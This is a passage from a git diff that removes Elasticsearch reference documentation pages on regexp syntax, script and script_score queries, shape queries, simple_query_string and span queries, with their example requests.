times the preceding character can repeat. For -example: - -.... -a{2} # matches 'aa' -a{2,4} # matches 'aa', 'aaa', and 'aaaa' -a{2,} # matches 'a` repeated two or more times -.... --- - -`|`:: -+ --- -OR operator. The match will succeed if the longest pattern on either the left -side OR the right side matches. For example: -.... -abc|xyz # matches 'abc' and 'xyz' -.... --- - -`( … )`:: -+ --- -Forms a group. You can use a group to treat part of the expression as a single -character. For example: - -.... -abc(def)? # matches 'abc' and 'abcdef' but not 'abcd' -.... --- - -`[ … ]`:: -+ --- -Match one of the characters in the brackets. For example: - -.... -[abc] # matches 'a', 'b', 'c' -.... 
- -Inside the brackets, `-` indicates a range unless `-` is the first character or -escaped. For example: - -.... -[a-c] # matches 'a', 'b', or 'c' -[-abc] # '-' is first character. Matches '-', 'a', 'b', or 'c' -[abc\-] # Escapes '-'. Matches 'a', 'b', 'c', or '-' -.... - -A `^` before a character in the brackets negates the character or range. For -example: - -.... -[^abc] # matches any character except 'a', 'b', or 'c' -[^a-c] # matches any character except 'a', 'b', or 'c' -[^-abc] # matches any character except '-', 'a', 'b', or 'c' -[^abc\-] # matches any character except 'a', 'b', 'c', or '-' -.... --- - -[discrete] -[[regexp-optional-operators]] -=== Optional operators - -You can use the `flags` parameter to enable more optional operators for -Lucene's regular expression engine. - -To enable multiple operators, use a `|` separator. For example, a `flags` value -of `COMPLEMENT|INTERVAL` enables the `COMPLEMENT` and `INTERVAL` operators. - -[discrete] -==== Valid values - -`ALL` (Default):: -Enables all optional operators. - -`COMPLEMENT`:: -+ --- -Enables the `~` operator. You can use `~` to negate the shortest following -pattern. For example: - -.... -a~bc # matches 'adc' and 'aec' but not 'abc' -.... --- - -`INTERVAL`:: -+ --- -Enables the `<>` operators. You can use `<>` to match a numeric range. For -example: - -.... -foo<1-100> # matches 'foo1', 'foo2' ... 'foo99', 'foo100' -foo<01-100> # matches 'foo01', 'foo02' ... 'foo99', 'foo100' -.... --- - -`INTERSECTION`:: -+ --- -Enables the `&` operator, which acts as an AND operator. The match will succeed -if patterns on both the left side AND the right side matches. For example: - -.... -aaa.+&.+bbb # matches 'aaabbb' -.... --- - -`ANYSTRING`:: -+ --- -Enables the `@` operator. You can use `@` to match any entire -string. - -You can combine the `@` operator with `&` and `~` operators to create an -"everything except" logic. For example: - -.... -@&~(abc.+) # matches everything except terms beginning with 'abc' -.... --- - -[discrete] -[[regexp-unsupported-operators]] -=== Unsupported operators -Lucene's regular expression engine does not support anchor operators, such as -`^` (beginning of line) or `$` (end of line). To match a term, the regular -expression must match the entire string. diff --git a/docs/reference/query-dsl/script-query.asciidoc b/docs/reference/query-dsl/script-query.asciidoc deleted file mode 100644 index cba078b5fc2..00000000000 --- a/docs/reference/query-dsl/script-query.asciidoc +++ /dev/null @@ -1,78 +0,0 @@ -[[query-dsl-script-query]] -=== Script query -++++ -Script -++++ - -Filters documents based on a provided <>. The -`script` query is typically used in a <>. - -WARNING: Using scripts can result in slower search speeds. See -<>. - - -[[script-query-ex-request]] -==== Example request - -[source,console] ----- -GET /_search -{ - "query": { - "bool": { - "filter": { - "script": { - "script": { - "source": "doc['num1'].value > 1", - "lang": "painless" - } - } - } - } - } -} ----- - - -[[script-top-level-params]] -==== Top-level parameters for `script` - -`script`:: -(Required, <>) Contains a script to run -as a query. This script must return a boolean value, `true` or `false`. - -[[script-query-notes]] -==== Notes - -[[script-query-custom-params]] -===== Custom Parameters - -Like <>, scripts are cached for faster execution. -If you frequently change the arguments of a script, we recommend you store them -in the script's `params` parameter. 
For example: - -[source,console] ----- -GET /_search -{ - "query": { - "bool": { - "filter": { - "script": { - "script": { - "source": "doc['num1'].value > params.param1", - "lang": "painless", - "params": { - "param1": 5 - } - } - } - } - } - } -} ----- - -===== Allow expensive queries -Script queries will not be executed if <> -is set to false. diff --git a/docs/reference/query-dsl/script-score-query.asciidoc b/docs/reference/query-dsl/script-score-query.asciidoc deleted file mode 100644 index 56930ba1252..00000000000 --- a/docs/reference/query-dsl/script-score-query.asciidoc +++ /dev/null @@ -1,369 +0,0 @@ -[[query-dsl-script-score-query]] -=== Script score query -++++ -Script score -++++ - -Uses a <> to provide a custom score for returned -documents. - -The `script_score` query is useful if, for example, a scoring function is expensive and you only need to calculate the score of a filtered set of documents. - - -[[script-score-query-ex-request]] -==== Example request -The following `script_score` query assigns each returned document a score equal to the `my-int` field value divided by `10`. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "script_score": { - "query": { - "match": { "message": "elasticsearch" } - }, - "script": { - "source": "doc['my-int'].value / 10 " - } - } - } -} --------------------------------------------------- - - -[[script-score-top-level-params]] -==== Top-level parameters for `script_score` -`query`:: -(Required, query object) Query used to return documents. - -`script`:: -+ --- -(Required, <>) Script used to compute the score of documents returned by the `query`. - -IMPORTANT: Final relevance scores from the `script_score` query cannot be -negative. To support certain search optimizations, Lucene requires -scores be positive or `0`. --- - -`min_score`:: -(Optional, float) Documents with a score lower -than this floating point number are excluded from the search results. - -`boost`:: -(Optional, float) Documents' scores produced by `script` are -multiplied by `boost` to produce final documents' scores. Defaults to `1.0`. - -[[script-score-query-notes]] -==== Notes - -[[script-score-access-scores]] -===== Use relevance scores in a script - -Within a script, you can -{ref}/modules-scripting-fields.html#scripting-score[access] -the `_score` variable which represents the current relevance score of a -document. - -[[script-score-predefined-functions]] -===== Predefined functions -You can use any of the available {painless}/painless-contexts.html[painless -functions] in your `script`. You can also use the following predefined functions -to customize scoring: - -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -We suggest using these predefined functions instead of writing your own. -These functions take advantage of efficiencies from {es}' internal mechanisms. 
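For example, a minimal sketch that combines the current relevance score with the
predefined `saturation` function, reusing the `message` and `my-int` fields from
the example request above (the pivot value `5` is only illustrative):

[source,console]
--------------------------------------------------
GET /_search
{
  "query": {
    "script_score": {
      "query": {
        "match": { "message": "elasticsearch" }
      },
      "script": {
        "source": "_score * saturation(doc['my-int'].value, 5)"
      }
    }
  }
}
--------------------------------------------------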
-
-[[script-score-saturation]]
-====== Saturation
-`saturation(value,k) = value/(k + value)`
-
-[source,js]
---------------------------------------------------
-"script" : {
-    "source" : "saturation(doc['my-int'].value, 1)"
-}
---------------------------------------------------
-// NOTCONSOLE
-
-[[script-score-sigmoid]]
-====== Sigmoid
-`sigmoid(value, k, a) = value^a/ (k^a + value^a)`
-
-[source,js]
---------------------------------------------------
-"script" : {
-    "source" : "sigmoid(doc['my-int'].value, 2, 1)"
-}
---------------------------------------------------
-// NOTCONSOLE
-
-[[random-score-function]]
-====== Random score function
-The `random_score` function generates scores that are uniformly distributed
-from 0 up to but not including 1.
-
-The `randomScore` function has the following syntax:
-`randomScore(<seed>, <fieldName>)`.
-It takes a required integer parameter, `seed`, and an optional string
-parameter, `fieldName`.
-
-[source,js]
---------------------------------------------------
-"script" : {
-    "source" : "randomScore(100, '_seq_no')"
-}
---------------------------------------------------
-// NOTCONSOLE
-
-If the `fieldName` parameter is omitted, the internal Lucene
-document ids will be used as a source of randomness. This is very efficient,
-but unfortunately not reproducible, since documents might be renumbered
-by merges.
-
-[source,js]
---------------------------------------------------
-"script" : {
-    "source" : "randomScore(100)"
-}
---------------------------------------------------
-// NOTCONSOLE
-
-Note that documents that are within the same shard and have the
-same value for the field will get the same score, so it is usually desirable
-to use a field that has unique values for all documents across a shard.
-A good default choice might be to use the `_seq_no`
-field, whose only drawback is that scores will change if the document is
-updated, since update operations also update the value of the `_seq_no` field.
-
-
-[[decay-functions-numeric-fields]]
-====== Decay functions for numeric fields
-You can read more about decay functions
-{ref}/query-dsl-function-score-query.html#function-decay[here].
-
-* `double decayNumericLinear(double origin, double scale, double offset, double decay, double docValue)`
-* `double decayNumericExp(double origin, double scale, double offset, double decay, double docValue)`
-* `double decayNumericGauss(double origin, double scale, double offset, double decay, double docValue)`
-
-[source,js]
---------------------------------------------------
-"script" : {
-    "source" : "decayNumericLinear(params.origin, params.scale, params.offset, params.decay, doc['dval'].value)",
-    "params": { <1>
-        "origin": 20,
-        "scale": 10,
-        "decay" : 0.5,
-        "offset" : 0
-    }
-}
---------------------------------------------------
-// NOTCONSOLE
-<1> Using `params` allows the script to be compiled only once, even if the params change.
- -[[decay-functions-geo-fields]] -====== Decay functions for geo fields - -* `double decayGeoLinear(String originStr, String scaleStr, String offsetStr, double decay, GeoPoint docValue)` - -* `double decayGeoExp(String originStr, String scaleStr, String offsetStr, double decay, GeoPoint docValue)` - -* `double decayGeoGauss(String originStr, String scaleStr, String offsetStr, double decay, GeoPoint docValue)` - -[source,js] --------------------------------------------------- -"script" : { - "source" : "decayGeoExp(params.origin, params.scale, params.offset, params.decay, doc['location'].value)", - "params": { - "origin": "40, -70.12", - "scale": "200km", - "offset": "0km", - "decay" : 0.2 - } -} --------------------------------------------------- -// NOTCONSOLE - -[[decay-functions-date-fields]] -====== Decay functions for date fields - -* `double decayDateLinear(String originStr, String scaleStr, String offsetStr, double decay, JodaCompatibleZonedDateTime docValueDate)` - -* `double decayDateExp(String originStr, String scaleStr, String offsetStr, double decay, JodaCompatibleZonedDateTime docValueDate)` - -* `double decayDateGauss(String originStr, String scaleStr, String offsetStr, double decay, JodaCompatibleZonedDateTime docValueDate)` - -[source,js] --------------------------------------------------- -"script" : { - "source" : "decayDateGauss(params.origin, params.scale, params.offset, params.decay, doc['date'].value)", - "params": { - "origin": "2008-01-01T01:00:00Z", - "scale": "1h", - "offset" : "0", - "decay" : 0.5 - } -} --------------------------------------------------- -// NOTCONSOLE - -NOTE: Decay functions on dates are limited to dates in the default format -and default time zone. Also calculations with `now` are not supported. - -[[script-score-functions-vector-fields]] -====== Functions for vector fields -<> are accessible through -`script_score` query. - -===== Allow expensive queries -Script score queries will not be executed if <> -is set to false. - -[[script-score-faster-alt]] -===== Faster alternatives -The `script_score` query calculates the score for -every matching document, or hit. There are faster alternative query types that -can efficiently skip non-competitive hits: - -* If you want to boost documents on some static fields, use the - <> query. - * If you want to boost documents closer to a date or geographic point, use the - <> query. - -[[script-score-function-score-transition]] -===== Transition from the function score query -We are deprecating the <> -query. We recommend using the `script_score` query instead. - -You can implement the following functions from the `function_score` query using -the `script_score` query: - -* <> -* <> -* <> -* <> -* <> - -[[script-score]] -====== `script_score` -What you used in `script_score` of the Function Score query, you -can copy into the Script Score query. No changes here. - -[[weight]] -====== `weight` -`weight` function can be implemented in the Script Score query through -the following script: - -[source,js] --------------------------------------------------- -"script" : { - "source" : "params.weight * _score", - "params": { - "weight": 2 - } -} --------------------------------------------------- -// NOTCONSOLE - -[[random-score]] -====== `random_score` - -Use `randomScore` function -as described in <>. 
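One option for combining several of these functions is to multiply their results
in a single script. For example, a sketch of a weighted `random_score`, where the
weight of `2` and the seed `100` are only illustrative:

[source,js]
--------------------------------------------------
"script" : {
  "source" : "params.weight * randomScore(100, '_seq_no')",
  "params" : {
    "weight" : 2
  }
}
--------------------------------------------------
// NOTCONSOLE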
- -[[field-value-factor]] -====== `field_value_factor` -`field_value_factor` function can be easily implemented through script: - -[source,js] --------------------------------------------------- -"script" : { - "source" : "Math.log10(doc['field'].value * params.factor)", - "params" : { - "factor" : 5 - } -} --------------------------------------------------- -// NOTCONSOLE - - -For checking if a document has a missing value, you can use -`doc['field'].size() == 0`. For example, this script will use -a value `1` if a document doesn't have a field `field`: - -[source,js] --------------------------------------------------- -"script" : { - "source" : "Math.log10((doc['field'].size() == 0 ? 1 : doc['field'].value()) * params.factor)", - "params" : { - "factor" : 5 - } -} --------------------------------------------------- -// NOTCONSOLE - -This table lists how `field_value_factor` modifiers can be implemented -through a script: - -[cols="<,<",options="header",] -|======================================================================= -| Modifier | Implementation in Script Score - -| `none` | - -| `log` | `Math.log10(doc['f'].value)` -| `log1p` | `Math.log10(doc['f'].value + 1)` -| `log2p` | `Math.log10(doc['f'].value + 2)` -| `ln` | `Math.log(doc['f'].value)` -| `ln1p` | `Math.log(doc['f'].value + 1)` -| `ln2p` | `Math.log(doc['f'].value + 2)` -| `square` | `Math.pow(doc['f'].value, 2)` -| `sqrt` | `Math.sqrt(doc['f'].value)` -| `reciprocal` | `1.0 / doc['f'].value` -|======================================================================= - -[[decay-functions]] -====== `decay` functions -The `script_score` query has equivalent <> -that can be used in script. - -include::{es-repo-dir}/vectors/vector-functions.asciidoc[] - -[[score-explanation]] -====== Explain request -Using an <> provides an explanation of how the parts of a score were computed. The `script_score` query can add its own explanation by setting the `explanation` parameter: - -[source,console] --------------------------------------------------- -GET /my-index-000001/_explain/0 -{ - "query": { - "script_score": { - "query": { - "match": { "message": "elasticsearch" } - }, - "script": { - "source": """ - long count = doc['count'].value; - double normalizedCount = count / 10; - if (explanation != null) { - explanation.set('normalized count = count / 10 = ' + count + ' / 10 = ' + normalizedCount); - } - return normalizedCount; - """ - } - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -Note that the `explanation` will be null when using in a normal `_search` request, so having a conditional guard is best practice. diff --git a/docs/reference/query-dsl/shape-queries.asciidoc b/docs/reference/query-dsl/shape-queries.asciidoc deleted file mode 100644 index 2e44069c066..00000000000 --- a/docs/reference/query-dsl/shape-queries.asciidoc +++ /dev/null @@ -1,23 +0,0 @@ -[[shape-queries]] -[role="xpack"] -[testenv="basic"] -== Shape queries - - -Like <> Elasticsearch supports the ability to index -arbitrary two dimension (non Geospatial) geometries making it possible to -map out virtual worlds, sporting venues, theme parks, and CAD diagrams. - -Elasticsearch supports two types of cartesian data: -<> fields which support x/y pairs, and -<> fields, which support points, lines, circles, polygons, multi-polygons, etc. 
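For illustration only, a minimal mapping that indexes both kinds of cartesian data
might look like the following sketch; the index and field names are placeholders:

[source,console]
--------------------------------------------------
PUT /my-cartesian-index
{
  "mappings": {
    "properties": {
      "location":  { "type": "point" },
      "footprint": { "type": "shape" }
    }
  }
}
--------------------------------------------------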
- -The queries in this group are: - -<> query:: -Finds documents with: -* `shapes` which either intersect, are contained by, are within or do not intersect -with the specified shape -* `points` which intersect the specified shape - -include::shape-query.asciidoc[] diff --git a/docs/reference/query-dsl/shape-query.asciidoc b/docs/reference/query-dsl/shape-query.asciidoc deleted file mode 100644 index 86ec64ff08e..00000000000 --- a/docs/reference/query-dsl/shape-query.asciidoc +++ /dev/null @@ -1,190 +0,0 @@ -[[query-dsl-shape-query]] -[role="xpack"] -[testenv="basic"] -=== Shape query -++++ -Shape -++++ - -Queries documents that contain fields indexed using the `shape` type. - -Requires the <>. - -The query supports two ways of defining the target shape, either by -providing a whole shape definition, or by referencing the name, or id, of a shape -pre-indexed in another index. Both formats are defined below with -examples. - -==== Inline Shape Definition - -Similar to the `geo_shape` query, the `shape` query uses -http://geojson.org[GeoJSON] or -{wikipedia}/Well-known_text_representation_of_geometry[Well Known Text] -(WKT) to represent shapes. - -Given the following index: - -[source,console] --------------------------------------------------- -PUT /example -{ - "mappings": { - "properties": { - "geometry": { - "type": "shape" - } - } - } -} - -PUT /example/_doc/1?refresh=wait_for -{ - "name": "Lucky Landing", - "geometry": { - "type": "point", - "coordinates": [ 1355.400544, 5255.530286 ] - } -} --------------------------------------------------- -// TESTSETUP - -The following query will find the point using the Elasticsearch's -`envelope` GeoJSON extension: - -[source,console] --------------------------------------------------- -GET /example/_search -{ - "query": { - "shape": { - "geometry": { - "shape": { - "type": "envelope", - "coordinates": [ [ 1355.0, 5355.0 ], [ 1400.0, 5200.0 ] ] - }, - "relation": "within" - } - } - } -} --------------------------------------------------- - -//// -[source,console-result] --------------------------------------------------- -{ - "took": 3, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped": 0, - "failed": 0 - }, - "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "max_score": 0.0, - "hits": [ - { - "_index": "example", - "_type": "_doc", - "_id": "1", - "_score": 0.0, - "_source": { - "name": "Lucky Landing", - "geometry": { - "type": "point", - "coordinates": [ - 1355.400544, - 5255.530286 - ] - } - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 3/"took": $body.took/] -//// - -==== Pre-Indexed Shape - -The Query also supports using a shape which has already been indexed in -another index. This is particularly useful for when -you have a pre-defined list of shapes which are useful to your -application and you want to reference this using a logical name (for -example 'New Zealand') rather than having to provide their coordinates -each time. In this situation it is only necessary to provide: - -* `id` - The ID of the document that containing the pre-indexed shape. -* `index` - Name of the index where the pre-indexed shape is. Defaults -to 'shapes'. -* `path` - The field specified as path containing the pre-indexed shape. -Defaults to 'shape'. -* `routing` - The routing of the shape document if required. 
- -The following is an example of using the Filter with a pre-indexed -shape: - -[source,console] --------------------------------------------------- -PUT /shapes -{ - "mappings": { - "properties": { - "geometry": { - "type": "shape" - } - } - } -} - -PUT /shapes/_doc/footprint -{ - "geometry": { - "type": "envelope", - "coordinates": [ [ 1355.0, 5355.0 ], [ 1400.0, 5200.0 ] ] - } -} - -GET /example/_search -{ - "query": { - "shape": { - "geometry": { - "indexed_shape": { - "index": "shapes", - "id": "footprint", - "path": "geometry" - } - } - } - } -} --------------------------------------------------- - -==== Spatial Relations - -The following is a complete list of spatial relation operators available: - -* `INTERSECTS` - (default) Return all documents whose `shape` field -intersects the query geometry. -* `DISJOINT` - Return all documents whose `shape` field -has nothing in common with the query geometry. -* `WITHIN` - Return all documents whose `shape` field -is within the query geometry. -* `CONTAINS` - Return all documents whose `shape` field -contains the query geometry. - -[discrete] -==== Ignore Unmapped - -When set to `true` the `ignore_unmapped` option will ignore an unmapped field -and will not match any documents for this query. This can be useful when -querying multiple indexes which might have different mappings. When set to -`false` (the default value) the query will throw an exception if the field -is not mapped. diff --git a/docs/reference/query-dsl/simple-query-string-query.asciidoc b/docs/reference/query-dsl/simple-query-string-query.asciidoc deleted file mode 100644 index 7b79e82f9ab..00000000000 --- a/docs/reference/query-dsl/simple-query-string-query.asciidoc +++ /dev/null @@ -1,309 +0,0 @@ -[[query-dsl-simple-query-string-query]] -=== Simple query string query -++++ -Simple query string -++++ - -Returns documents based on a provided query string, using a parser with a -limited but fault-tolerant syntax. - -This query uses a <> to parse and -split the provided query string into terms based on special operators. The query -then <> each term independently before returning matching -documents. - -While its syntax is more limited than the -<>, the `simple_query_string` -query does not return errors for invalid syntax. Instead, it ignores any invalid -parts of the query string. - -[[simple-query-string-query-ex-request]] -==== Example request - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "simple_query_string" : { - "query": "\"fried eggs\" +(eggplant | potato) -frittata", - "fields": ["title^5", "body"], - "default_operator": "and" - } - } -} --------------------------------------------------- - - -[[simple-query-string-top-level-params]] -==== Top-level parameters for `simple_query_string` - -`query`:: -(Required, string) Query string you wish to parse and use for search. See <>. - -`fields`:: -+ --- -(Optional, array of strings) Array of fields you wish to search. - -This field accepts wildcard expressions. You also can boost relevance scores for -matches to particular fields using a caret (`^`) notation. See -<> for examples. - -Defaults to the `index.query.default_field` index setting, which has a default -value of `*`. The `*` value extracts all fields that are eligible to term -queries and filters the metadata fields. All extracted fields are then combined -to build a query if no `prefix` is specified. - -WARNING: There is a limit on the number of fields that can be queried at once. 
-It is defined by the `indices.query.bool.max_clause_count` -<>, which defaults to `1024`. --- - -`default_operator`:: -+ --- -(Optional, string) Default boolean logic used to interpret text in the query -string if no operators are specified. Valid values are: - -`OR` (Default):: -For example, a query string of `capital of Hungary` is interpreted as `capital -OR of OR Hungary`. - -`AND`:: -For example, a query string of `capital of Hungary` is interpreted as `capital -AND of AND Hungary`. --- - -`all_fields`:: -deprecated:[6.0.0, set `fields` to `*` instead](Optional, boolean) If `true`, -search all searchable fields in the index's field mapping. - -`analyze_wildcard`:: -(Optional, Boolean) If `true`, the query attempts to analyze wildcard terms in -the query string. Defaults to `false`. - -`analyzer`:: -(Optional, string) <> used to convert text in the -query string into tokens. Defaults to the -<> mapped for the -`default_field`. If no analyzer is mapped, the index's default analyzer is used. - -`auto_generate_synonyms_phrase_query`:: -(Optional, Boolean) If `true`, <> -queries are automatically created for multi-term synonyms. Defaults to `true`. -See <> for an example. - -`flags`:: -(Optional, string) List of enabled operators for the -<>. Defaults to `ALL` -(all operators). See <> for valid values. - -`fuzzy_max_expansions`:: -(Optional, integer) Maximum number of terms to which the query expands for fuzzy -matching. Defaults to `50`. - -`fuzzy_prefix_length`:: -(Optional, integer) Number of beginning characters left unchanged for fuzzy -matching. Defaults to `0`. - -`fuzzy_transpositions`:: -(Optional, Boolean) If `true`, edits for fuzzy matching include -transpositions of two adjacent characters (ab → ba). Defaults to `true`. - -`lenient`:: -(Optional, Boolean) If `true`, format-based errors, such as providing a text -value for a <> field, are ignored. Defaults to `false`. - -`minimum_should_match`:: -(Optional, string) Minimum number of clauses that must match for a document to -be returned. See the <> for valid values and more information. - -`quote_field_suffix`:: -+ --- -(Optional, string) Suffix appended to quoted text in the query string. - -You can use this suffix to use a different analysis method for exact matches. -See <>. --- - - -[[simple-query-string-query-notes]] -==== Notes - -[[simple-query-string-syntax]] -===== Simple query string syntax -The `simple_query_string` query supports the following operators: - -* `+` signifies AND operation -* `|` signifies OR operation -* `-` negates a single token -* `"` wraps a number of tokens to signify a phrase for searching -* `*` at the end of a term signifies a prefix query -* `(` and `)` signify precedence -* `~N` after a word signifies edit distance (fuzziness) -* `~N` after a phrase signifies slop amount - -To use one of these characters literally, escape it with a preceding backslash -(`\`). - -The behavior of these operators may differ depending on the `default_operator` -value. For example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "simple_query_string": { - "fields": [ "content" ], - "query": "foo bar -baz" - } - } -} --------------------------------------------------- - -This search is intended to only return documents containing `foo` or `bar` that -also do **not** contain `baz`. However because of a `default_operator` of `OR`, -this search actually returns documents that contain `foo` or `bar` and any -documents that don't contain `baz`. 
To return documents as intended, change the query string to `foo bar +-baz`.
-
-[[supported-flags]]
-===== Limit operators
-You can use the `flags` parameter to limit the supported operators for the
-simple query string syntax.
-
-To explicitly enable only specific operators, use a `|` separator. For example,
-a `flags` value of `OR|AND|PREFIX` disables all operators except `OR`, `AND`,
-and `PREFIX`.
-
-[source,console]
---------------------------------------------------
-GET /_search
-{
-  "query": {
-    "simple_query_string": {
-      "query": "foo | bar + baz*",
-      "flags": "OR|AND|PREFIX"
-    }
-  }
-}
---------------------------------------------------
-
-[[supported-flags-values]]
-====== Valid values
-The available flags are:
-
-`ALL` (Default)::
-Enables all optional operators.
-
-`AND`::
-Enables the `+` AND operator.
-
-`ESCAPE`::
-Enables `\` as an escape character.
-
-`FUZZY`::
-Enables the `~N` operator after a word, where `N` is an integer denoting the
-allowed edit distance for matching. See <>.
-
-`NEAR`::
-Enables the `~N` operator after a phrase, where `N` is the maximum number of
-positions allowed between matching tokens. Synonymous with `SLOP`.
-
-`NONE`::
-Disables all operators.
-
-`NOT`::
-Enables the `-` NOT operator.
-
-`OR`::
-Enables the `\|` OR operator.
-
-`PHRASE`::
-Enables the `"` quotes operator used to search for phrases.
-
-`PRECEDENCE`::
-Enables the `(` and `)` operators to control operator precedence.
-
-`PREFIX`::
-Enables the `*` prefix operator.
-
-`SLOP`::
-Enables the `~N` operator after a phrase, where `N` is the maximum number of
-positions allowed between matching tokens. Synonymous with `NEAR`.
-
-`WHITESPACE`::
-Enables whitespace as split characters.
-
-[[simple-query-string-boost]]
-===== Wildcards and per-field boosts in the `fields` parameter
-
-Fields can be specified with wildcards, for example:
-
-[source,console]
---------------------------------------------------
-GET /_search
-{
-  "query": {
-    "simple_query_string" : {
-      "query": "Will Smith",
-      "fields": [ "title", "*_name" ] <1>
-    }
-  }
-}
---------------------------------------------------
-
-<1> Query the `title`, `first_name` and `last_name` fields.
-
-Individual fields can be boosted with the caret (`^`) notation:
-
-[source,console]
---------------------------------------------------
-GET /_search
-{
-  "query": {
-    "simple_query_string" : {
-      "query" : "this is a test",
-      "fields" : [ "subject^3", "message" ] <1>
-    }
-  }
-}
---------------------------------------------------
-
-<1> The `subject` field is three times as important as the `message` field.
-
-[[simple-query-string-synonyms]]
-===== Synonyms
-
-The `simple_query_string` query supports multi-term synonym expansion with the <> token filter. When this filter is used, the parser creates a phrase query for each multi-term synonym.
-For example, the synonym `"ny, new york"` would produce:
-
-`(ny OR ("new york"))`
-
-It is also possible to match multi-term synonyms with conjunctions instead:
-
-[source,console]
---------------------------------------------------
-GET /_search
-{
-  "query": {
-    "simple_query_string" : {
-      "query" : "ny city",
-      "auto_generate_synonyms_phrase_query" : false
-    }
-  }
-}
---------------------------------------------------
-
-The example above creates a boolean query:
-
-`(ny OR (new AND york)) city`
-
-that matches documents with the term `ny` or the conjunction `new AND york`.
-By default, the parameter `auto_generate_synonyms_phrase_query` is set to `true`.
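-
-[[simple-query-string-escape]]
-===== Escaping reserved characters
-
-As noted in the syntax section above, any of the reserved characters can be
-matched literally by escaping it with a preceding backslash. The following is a
-minimal sketch (the `content` field is hypothetical); note that the backslash
-itself must be escaped again inside the JSON string:
-
-[source,console]
---------------------------------------------------
-GET /_search
-{
-  "query": {
-    "simple_query_string": {
-      "query": "coffee \\+ milk", <1>
-      "fields": [ "content" ]
-    }
-  }
-}
---------------------------------------------------
-
-<1> The parser receives `coffee \+ milk`, so the `+` is passed through to
-analysis as part of the term text instead of being interpreted as the AND
-operator.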
- diff --git a/docs/reference/query-dsl/span-containing-query.asciidoc b/docs/reference/query-dsl/span-containing-query.asciidoc deleted file mode 100644 index ec1c0bdf0a8..00000000000 --- a/docs/reference/query-dsl/span-containing-query.asciidoc +++ /dev/null @@ -1,35 +0,0 @@ -[[query-dsl-span-containing-query]] -=== Span containing query -++++ -Span containing -++++ - -Returns matches which enclose another span query. The span containing -query maps to Lucene `SpanContainingQuery`. Here is an example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "span_containing": { - "little": { - "span_term": { "field1": "foo" } - }, - "big": { - "span_near": { - "clauses": [ - { "span_term": { "field1": "bar" } }, - { "span_term": { "field1": "baz" } } - ], - "slop": 5, - "in_order": true - } - } - } - } -} --------------------------------------------------- - -The `big` and `little` clauses can be any span type query. Matching -spans from `big` that contain matches from `little` are returned. diff --git a/docs/reference/query-dsl/span-field-masking-query.asciidoc b/docs/reference/query-dsl/span-field-masking-query.asciidoc deleted file mode 100644 index a101c8afc47..00000000000 --- a/docs/reference/query-dsl/span-field-masking-query.asciidoc +++ /dev/null @@ -1,45 +0,0 @@ -[[query-dsl-span-field-masking-query]] -=== Span field masking query -++++ -Span field masking -++++ - -Wrapper to allow span queries to participate in composite single-field span queries by 'lying' about their search field. The span field masking query maps to Lucene's `SpanFieldMaskingQuery` - -This can be used to support queries like `span-near` or `span-or` across different fields, which is not ordinarily permitted. - -Span field masking query is invaluable in conjunction with *multi-fields* when same content is indexed with multiple analyzers. For instance we could index a field with the standard analyzer which breaks text up into words, and again with the english analyzer which stems words into their root form. - -Example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "span_near": { - "clauses": [ - { - "span_term": { - "text": "quick brown" - } - }, - { - "field_masking_span": { - "query": { - "span_term": { - "text.stems": "fox" - } - }, - "field": "text" - } - } - ], - "slop": 5, - "in_order": false - } - } -} --------------------------------------------------- - -Note: as span field masking query returns the masked field, scoring will be done using the norms of the field name supplied. This may lead to unexpected scoring behaviour. \ No newline at end of file diff --git a/docs/reference/query-dsl/span-first-query.asciidoc b/docs/reference/query-dsl/span-first-query.asciidoc deleted file mode 100644 index 77e3f557fd9..00000000000 --- a/docs/reference/query-dsl/span-first-query.asciidoc +++ /dev/null @@ -1,26 +0,0 @@ -[[query-dsl-span-first-query]] -=== Span first query -++++ -Span first -++++ - -Matches spans near the beginning of a field. The span first query maps -to Lucene `SpanFirstQuery`. Here is an example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "span_first": { - "match": { - "span_term": { "user.id": "kimchy" } - }, - "end": 3 - } - } -} --------------------------------------------------- - -The `match` clause can be any other span type query. The `end` controls -the maximum end position permitted in a match. 
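-
-The span field masking example above queries a `text.stems` multi-field that is
-not defined on that page. A minimal sketch of a mapping that would produce such
-a field (the index name is hypothetical) indexes the same text with both the
-`standard` and `english` analyzers:
-
-[source,console]
---------------------------------------------------
-PUT /my-masking-example
-{
-  "mappings": {
-    "properties": {
-      "text": {
-        "type": "text",
-        "analyzer": "standard",
-        "fields": {
-          "stems": {
-            "type": "text",
-            "analyzer": "english" <1>
-          }
-        }
-      }
-    }
-  }
-}
---------------------------------------------------
-
-<1> The `english` analyzer stems tokens, so a word like `foxes` in the `text`
-field is indexed as `fox` in `text.stems`.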
diff --git a/docs/reference/query-dsl/span-multi-term-query.asciidoc b/docs/reference/query-dsl/span-multi-term-query.asciidoc deleted file mode 100644 index 8a78c2ba197..00000000000 --- a/docs/reference/query-dsl/span-multi-term-query.asciidoc +++ /dev/null @@ -1,46 +0,0 @@ -[[query-dsl-span-multi-term-query]] -=== Span multi-term query -++++ -Span multi-term -++++ - -The `span_multi` query allows you to wrap a `multi term query` (one of wildcard, -fuzzy, prefix, range or regexp query) as a `span query`, so -it can be nested. Example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "span_multi": { - "match": { - "prefix": { "user.id": { "value": "ki" } } - } - } - } -} --------------------------------------------------- - -A boost can also be associated with the query: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "span_multi": { - "match": { - "prefix": { "user.id": { "value": "ki", "boost": 1.08 } } - } - } - } -} --------------------------------------------------- - -WARNING: `span_multi` queries will hit too many clauses failure if the number of terms that match the query exceeds the -boolean query limit (defaults to 1024).To avoid an unbounded expansion you can set the <> of the multi term query to `top_terms_*` rewrite. Or, if you use `span_multi` on `prefix` query only, -you can activate the <> field option of the `text` field instead. This will -rewrite any prefix query on the field to a single term query that matches the indexed prefix. - diff --git a/docs/reference/query-dsl/span-near-query.asciidoc b/docs/reference/query-dsl/span-near-query.asciidoc deleted file mode 100644 index 0a1aa7082fb..00000000000 --- 